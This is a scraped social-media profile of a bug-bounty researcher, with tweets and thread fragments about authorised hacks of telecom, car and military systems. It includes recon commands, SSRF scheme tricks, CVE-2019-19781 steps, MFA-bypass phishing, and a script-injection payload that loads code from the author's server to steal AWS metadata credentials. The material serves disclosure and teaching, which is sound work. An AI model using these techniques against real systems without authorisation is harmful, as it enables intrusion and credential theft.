Corben Leo
@hacker_
Followers
68,531
Following
672
Media
280
Statuses
4,158
I hack stuff (legally) | Jesus follower | Co-founder @boringmattress
Brookings, South Dakota
Joined February 2016
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
#LCDLF4
• 231987 Tweets
Cauca
• 140455 Tweets
Costello
• 107797 Tweets
Romeh
• 73607 Tweets
#WWERaw
• 51664 Tweets
Lupillo
• 49138 Tweets
Maripily
• 40287 Tweets
SAROCHA REBECCA ON RED CARPET
• 35632 Tweets
#ラヴィット
• 30050 Tweets
FELIX ENAMORA A BARCELONA
• 29735 Tweets
STRAY KIDS HITS HOT100
• 26881 Tweets
BLINDAJE FURIOSO
• 25290 Tweets
Scarlett Johansson
• 23954 Tweets
定額減税
• 20160 Tweets
ビットコイン
• 14013 Tweets
WELCOME TREASURE TO THAILAND
• 13994 Tweets
給与明細
• 11458 Tweets
Fani Willis
• 11347 Tweets
金額明記
• 10795 Tweets
Lyra
• 10790 Tweets
Pinned Tweet
In 2010, WikiLeaks released a classified document.
A list of infrastructure critical to U.S national security.
The government listed a Trans-Atlantic cable.
3 years ago,
19-year-old me gained ADMIN access to that cable (and another; shared codebase).
🧵Here's how I found it
92
1K
5K
Uber was hacked.
The hacker social engineered an employee -> logged into the VPN and scanned their intranet. 👇
92
2K
7K
I'm uncomfortable tweeting stuff like this out, but...
I found a critical vulnerability in
@opensea
this weekend and reported it through
@Hacker0x01
.
They fixed the issue within 3 hours of reporting and I just got this notification👏🫢
340
315
5K
I hacked a phone company earlier last year.
I found a stupidly simple way to view the call logs of 50M customers.
Here's how I did it:
94
837
5K
I've made $500k+ from SSRF vulnerabilities.
Here are my tricks:
89
1K
4K
I hacked a large company (70k+ employees) through social engineering. Legally of course.
• I set up the infrastructure
• Scraped names & emails with LinkedIn
• Sent 200 phishing emails.
I had access to their AWS console within 2 minutes.
And much more:
77
619
4K
I hacked a car company last year.
I found a way to steal every customer's
• Name
• Email address
• Phone number
• Address
Here's how I did it:
113
746
4K
Hacking CAN be easy.
But, often it's not.
Let's develop your technical skills, they obviously matter.
A roadmap:
135
875
3K
I hacked a car company.
Here's how I gained access to hundreds of their codebases.
55
433
2K
I've spent the last 8 years hacking companies (legally).
Now, I'm starting a mattress company.
I'm taking on a $16B industry to solve a huge problem.
Here's why:
82
63
2K
How you can learn to hack web3 (and protect millions of dollars):
101
505
2K
Apparently there was an internal network share that contained powershell scripts...
"One of the powershell scripts contained the username and password for a admin user in Thycotic (PAM) Using this i was able to extract secrets for all services, DA, DUO, Onelogin, AWS, GSuite"
26
325
2K
Anyone can hack.
Yes, anyone.
You can hack. Big companies. With little to no technical skills. And make thousands of dollars. Legally.
It requires some common sense & a web browser.
Note: DON'T do this to websites unless you have permission! It's illegal.
Here's how:
42
350
1K
I hacked the military.
A system containing the information of military personnel.
Yet, the hack was done legally.
Here's how I did it and how it was done legally:
25
294
1K
@opensea
@Hacker0x01
I'm not trying to brag, I never share bounty amounts – but I'm literally shaking right now and wanted to share my amazement.
I'm super duper lucky and blessed to have found this 🙏
46
9
1K
Who's your phone provider?
Well, there's a good chance that I've hacked them!
Last year, I breached a major telecom company (many times...)
This time, I stole the data of every employee.
(well, I didn't steal all of it, but I could've)...
Here's how I did it:
56
258
1K
302 Military FTP servers.
Imagine you had access to 302 military FTP servers.
What data could possibly be on them?
Who would get hurt by that data?
Who would it benefit?
5 years ago,
A 17-year-old gained access to 300 military FTP servers.
Here's how I did it:
27
260
1K
A $1,000,000 bounty?
How
@kucoincom
leaked user information via a simple vulnerability
And why you shouldn't hack on
@HackenProof
.
76
219
1K
You can find easy critical vulnerabilities.
It just takes finding unique attack surfaces.
Here's an example of how you can, using a story of how I hacked a car company:
14
208
943
Are you into web hacking?
If so, you must have technology-specific wordlists
If not, you're missing obvious vulnerabilities.
Don't believe me?
Let's look at an information disclosure in an ASP[.]NET Core site:
34
246
890
Authorization.
Easy to understand. Critical if implemented incorrectly.
Want to see an example? (dumb question Corben, yes, why not)
Last month, I found an auth bypass that lead to a full account takeover.
Here's how I found it:
40
235
839
See a host that's redirecting to Single-Sign on?
Don't skip it.
Do Content-Discovery.
Use gau.
Then ffuf.
You will be surprised at the misconfigurations you'll find.
And the things you can access (that you shouldn't be able to).
38
183
783
It's easy to find attack surfaces that others haven't.
You just need to think creatively.
"But Corben, I don't know how!"
That's what I'm here for.
I'll share some simple methodology that works.
(so you can find vulnerabilities...and make money)
A story:
40
184
787
Well, she said yes ❤️
It was hard to hide a puppy from her too, but totally worth it.
97
6
716
TLDR;
- Participating in a bug bounty program (telecommunications company)
- Scanned their IPV4 Ranges
- Found a webserver that said "███ Cable System"
- Directory brute-force found /admin/accounts/
- The endpoint set a valid admin JSESSIONID.
In 2010, WikiLeaks released a classified document.
A list of infrastructure critical to U.S national security.
The government listed a Trans-Atlantic cable.
3 years ago,
19-year-old me gained ADMIN access to that cable (and another; shared codebase).
🧵Here's how I found it
92
1K
5K
16
61
668
5/ I tried again, with another person's ID:
It actually worked. 🤦🏻♂️
An incredibly stupid, simple vulnerability affecting 50M+ customers. Insane
3
19
570
What happens when you combine hackers and phones?
Phreaking?
Social Engineering?
Sure! Valid answers.
What you didn't think of is web vulnerabilities.
XXE.
I found an XXE by phone call in a bug bounty program.
Here's the story:
13
142
564
10/ I reported it immediately and started pinging their program manager.
It was the best response I've ever gotten.
And will ever get.
8
19
550
1/ The scope of this program was *.███.com
With a wildcard, basic recon is:
Subdomain Enumeration + HTTP server probing:
$ subfinder -d example[dot]com | httpx -o example.httpx
5
51
539
🚨 429 Too Many Requests.
You've been here before.
Getting rate-limited is THEE. WORST.
Thankfully, you can easily bypass it.
In most cases.
FireProx (by
@ustayready
) lets you use a different IP for every request (using AWS).
It's simple to use too:
24
148
525
Finding vulnerabilities got easier.
Pair
@WeaselJs
+ Cursor by
@anysphere
.
Javascript analysis will never be the same
6
120
518
6/ I eventually found 5 other similar issues that leaked:
• Customer names, phone numbers
• Payment details (cards, amounts, dates of payments)
• Etc.
I reported them all to their bug bounty program and they duplicated them into one report and eventually fixed the issues.
9
12
509
Attack surface is larger than you’d expect.
Most companies have domain names that they use internally (for development, QA, etc). Ex, PayPal uses “”
Heres how you can find network misconfigurations and find “internal assets” on the public internet:
16
99
513
The simplest observations can lead to finding huge vulnerabilities.
Here's how
@Shlibness
& I gained access to data of 25,233 employees:
19
98
495
ratio
I've made over 100k on SSRF vulnerabilities.
They aren't always as simple as pointing it at localhost or AWS Metadata service.
Here are some tricks I've picked up over the past 5 years of web app testing:
47
876
3K
6
31
480
Directory-brute forcing?
You should NEVER filter based on status code.
Paths can exist and return a 404.
I’ve seen this so many times:
/noexist/ -> 404 Not Found.
/api/ -> 404 Not Found, but different response body (JSON formatted)
/api/endpoint -> 200 OK
Filter by
8
74
464
New blog post: Analysis of an Atlassian Crowd RCE - CVE-2019-11580
9
205
444
It's finally out!!! New blog post: Advanced CORS Exploitation Techniques:
7
239
439
Most companies have domain names that they use internally (for development, QA, etc). For example, PayPal uses "". I've seen so many network misconfigurations and you can find these juicy internal hosts on the public internet. 1/🧵
10
111
441
✋Traditional file & directory brute-forcing can only get you so far.
👉 Here’s an easy way to generate target-based wordlists with gau and
@tomnomnom
’s unfurl:
10
123
433
You're using Burp Collaborator wrong.
Don't use Burp's default collaborator instance when testing for out of band vulnerabilities.
Many companies use egress filtering & block outbound traffic to the default collaborator domain
It's worth setting up a
7
96
438
I just rewrote and now released subjs v1.0.0 (). Javascript files can contain an abundance of valuable information when hacking – from undocumented API endpoints to secrets – if you aren't digging through them, you need to!
#bugbountytips
3
136
411
1/ I used Evilnginx2 to bypass MFA (Okta & Duo)
From Okta, I could access Outlook, Sharepoint, Github, & many more services on behalf of the 50+ employees that fell for the phish.
I was blown away by how easy it was to pull off this "hack" that could've impacted 60M+ people.
7
19
402
You're probably directory brute-forcing wrong.
You should be methodical when targeting frameworks such as Express, Rails, Flask, Django, etc.
2/ By default, ffuf uses the GET HTTP method.
You should be fuzzing with different HTTP methods.
Try using a wordlist multiple times
3
87
407
3/ After spidering the site with Burp, I eventually came across an old Javascript file.
This javascript contained a reference to a JSP file with a name that indicated similar functionality:
"/myaccount/modals/view_call_log_details_modal.jsp"
1
9
382
How anyone could've accessed vulnerability reports sent to a $40B+ company:
11
68
389
1/ I've been in this bug bounty program for quite some time.
I previously bought a phone plan so I could login and test functionality as an authenticated user.
In the dashboard, there was a tab to view your call logs.
2
10
376
The DoD experienced its largest leak in 10 years.
Jack Teixeira shared highly classified military documents on Discord.
He was arrested.
3 years ago, a 20-year-old kid found a vulnerability that leaked confidential aircraft & missile information.
Here's how I did it:
9
68
381
getallurls - fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl:
Quick script that I use religiously for content discovery.
7
115
370
41
32
369
Oof.
The gal sitting next to me on the plane works for a pretty big company.
She’s got a spreadsheet open on her computer…
And it’s got passwords lol
Company2021@
26
9
362
@kvanh
@ErrataRob
I got paid $0 because “all of these other companies own it too so we’re not the only ones at fault”
11
10
340
2/ The URL contained a parameter called "subscriberId".
It contained a numerical ID, so obviously I tried to change it to another users.
Unfortunately, it didn't work.
4
5
333
Understanding how systems work is a competitive advantage as a hacker.
How do you get to this point?
Build.
Code a complex, modern application that relies on:
-> a database
-> caching/memory-store (redis)
-> message broker (rabbitmq)
etc.
Deploy it.
#typefully
5
37
343
1. Try other URL schemes:
• file:// (file read)
• netdoc:// (file read)
• dict://
• gopher://
• jar://
• ldap://
• and more!
You might be able to get file read.
Or send multi-line requests to gain additional impact
(Ex: gopher + redis = likely RCE)
3
34
336
spent a few days trying to hack voting machines with some great researchers.
great collaboration between vendors & researchers to secure democracy 🇺🇸
6
14
331
4/ So, I visited the endpoint:
The page loaded, and in the response I saw my call logs:
Hm. What happens if I try to change the subscriberId to someone else's here?
1
5
317
Super excited to announce that I've joined
@assetnote
as a software engineer! Stoked to work with great people like
@infosec_au
and on an amazing product 🎉
26
5
325
2/ I searched the company's name on bgp.he\.net
Saved their IP ranges.
I ran
@ErrataRob
's masscan, probed for HTTP(s) servers, and grabbed the HTTP titles.
Looked something like:
$ masscan -p 80,443 -iL ranges -oL out.txt
$ cat out.txt | httpx -title
One title stuck out:
1
10
312
1. I started with reconnaisance:
- Subdomain enumeration to find the company's subdomains.
- HTTP server probing to see what's online
$ subfinder -d example[dot]com | httpx -o target.httpx
I came across a webserver running IIS:
hxxps://installersupport.██████.com/
4
36
305
A CVE-2019-19781 is this easy –
1. Traversal to vpns folder, traversal in the NSC_HEADER + to write a malicious bookmark to the /netscaler/portal/templates/ folder (1st HTTP request),
2. Passing that template through the Template Toolkit (2nd request)
5
104
301
I've re-written gau! This includes speed improvements, a new provider (urlscan), loading options from configuration files, new filter support, socks5 proxy support, and more!
Make sure to grab the new version!
12
88
288
8/ Redirected to the home page.
Second visit:
> HTTP/1.1 200 OK
> --- snip ---
> <title>Account Administration</title>
HOLY **** IT WORKED.
This is a HIGHLY redacted version of what I saw:
So,
2
6
289
Internal assets = sensitive.
Apps meant for internal usage usually have weaker security than those facing the external.
Sometimes, internal assets aren't so internal.
Here's how you can find such misconfigurations:
13
85
292
1/ It began with a bug bounty program.
Of a telecommunications company (that I can't name publicly).
As some of you may know, I love recon.
I had already done subdomain enumeration.
The next step was to scan their IP ranges.
So,
2
7
286
14/ I verified they worked:
$ export AWS_ACCESS_KEY_ID=
$ export AWS_SECRET_ACCESS_KEY=
$ export AWS_SESSION_TOKEN=
$ aws sts get-caller-identity
The keys worked.
And Scout2 proved I had access to too much :)
4
10
286
4/ Look at the code in this picture.
Routes are defined explicitly. In this example:
You must GET /one to get a response.
You must POST /two to get a valid response.
Brute-force with API routes and dictionary words.
(PS:
@assetnote
wrote about Contextual Content Discovery)
1
13
276
9/ I clicked through the menus to see if I was actually authenticated.
I was. FULLY. AUTHENTICATED.
On that same IP range,
They had ANOTHER system for ANOTHER cable.
I tried the same attack.
IT WORKED!
I had admin access to TWO. Different. Cables.
I was in disbelief.
So,
4
3
273
2/ HTTPX gave me 300 web-servers to target.
One stuck out to me:
hxxps://rendering-prd.redacted[.]com
"rendering" stuck out to me. Why?
Render means to "process information". Often to another format.
With web apps, it's typically HTML to another format.
1
10
273
Note: this is all alleged. I found the Telegram in this email that the hacker sent out via an Uber employees HackerOne account (via policy update). I’ve obviously got nothing to do it and have not reproduced or confirmed any of this.
4
11
271
Update: A Threat Actor claims to have completely compromised Uber - they have posted screenshots of their AWS instance, HackerOne administration panel, and more.
They are openly taunting and mocking
@Uber
.
77
791
2K
9
34
266
1/
Become a dev (to break you must understand):
• Read "Mastering Ethereum" (It's on GitHub)
• Learn Solidity:
• CryptoZombies
• solidity-by-example[.]org
• Solidity Docs
• Learn how to use HardHat
• Familiarize yourself with widely used contracts (EIP 20)
3
31
267
Announcing the public release of my tool secretz! Written during our research of TravisCI, secretz is a tool that minimizes the large attack surface of Travis CI. It automatically fetches repos, builds, and logs for any given organization. Check it out:
10
112
271
5/ The directory /admin/
Remember, it's running Apache Tomcat.
I built a wordlist for .jsp files using BigQuery. (Learned from
@assetnote
's commonspeak)
Bruteforcing found a few JSP files, but they all redirected to the login page.
Gah. Well,
2
3
265
15
3
267
Companies run software they don't write.
Ex: Jira, GoAnywhere, etc.
Finding vulns in these types of software = lots of vuln targets = $$$
So, do code review!
Need the source? Find the software AWS's AMI Catalog.
Launch a server. SSH in. Pull it. Review it
#typefully
day 4
3
37
269
2/ Learn networking.
@three_cube
has some amazing FREE resources on his website.
Google "Network Basics for Hackers" and go through all of the posts.
Here, learn TCP/IP basics, Subnetting, Network Masks, DNS, HTTP, etc.
BORING? Maybe. But this knowledge is invaluable.
3
34
260
Here's a short post from ~3 years ago if you want to see a quick proof-of-concept.
#BugBountyTips
#infosec
If a web application allow you to upload a .zip file, zip:// is an interesting PHP wrapper to turn a LFI into a RCE.
#BugBounty
#BugBountyTips
#InfoSec
14
649
2K
3
68
265
1/
- Learn Bash scripting & the command line
- Learn HTML & Javascript (CodeAcademy / W3 Schools)
- Learn Python (or Golang, Java, C#, or whatever).
- Learn some basic SQL.
2
26
259
2/ Phishing attacks are on the rise and are becoming more sophisticated.
Last year we saw Uber, Dropbox, Twilio, Axie Infinity ($625M theft), and more compromised through phishing.
People argue that humans are the "weakest link", yet, companies of all sizes still rely on:
1
13
255
10/ Success.
I got a request to /test.js with the User-Agent: Chrome/75.x.xx
Running "whois" on the requesting IP address showed it was from AWS.
AWS has a meta-data server at 169.254.169.254.
It can be used to generate temporary access keys.
To an AWS environment.
2
10
252
12. I wanted to verify that this data was fresh.
So, In the mobile app, I created another account.
I targeted the new account and it worked!!
I reported it to the company's bug bounty program on
@Hacker0x01
They fixed it and I was eventually rewarded for it!
6
6
254
Information is key.
What sort of information could be in an Airforce Database?
Who would get hurt by that data?
Who would it benefit?
5 years ago, 17-year-old me easily gained access to an Air Force database.
Legally, through
Here's how I did it:
9
63
248
3/ Forcing the consumption of cartoon training videos twice a year & hoping their SEG works.
While some organizations are moving towards FIDO2, many aren't & can't.
Companies aren't effectively equipping their employees to recognize & avoid the latest real-world threats.
4
13
245
Do you have any "Oh Sh*t" moments?
Here's one of mine from a year or two ago.
The time I took down an API. A production API.
Of an advertising company...On a Saturday...(and it stayed down for hours...)
Here's what happened:
23
46
246
12/ Headless browsers don't care.
So, I tried this javascript
POST /render HTTP.1,1
markup=<script src="hxxps://myserver/pwn.js"></script>
The server responded: 200 OK
Checked Burp Collaborator and it worked! My server had a request to "/main-production-worker-iam-role"
So
4
19
243
Finding vulnerabilities first = you get paid.
Want to be the first to hack on new functionality? Monitor your target’s JS files for new paths or parameters.
(automate with a headless browser to grab all dynamically loaded JS)
#typefully
day 9
4
24
246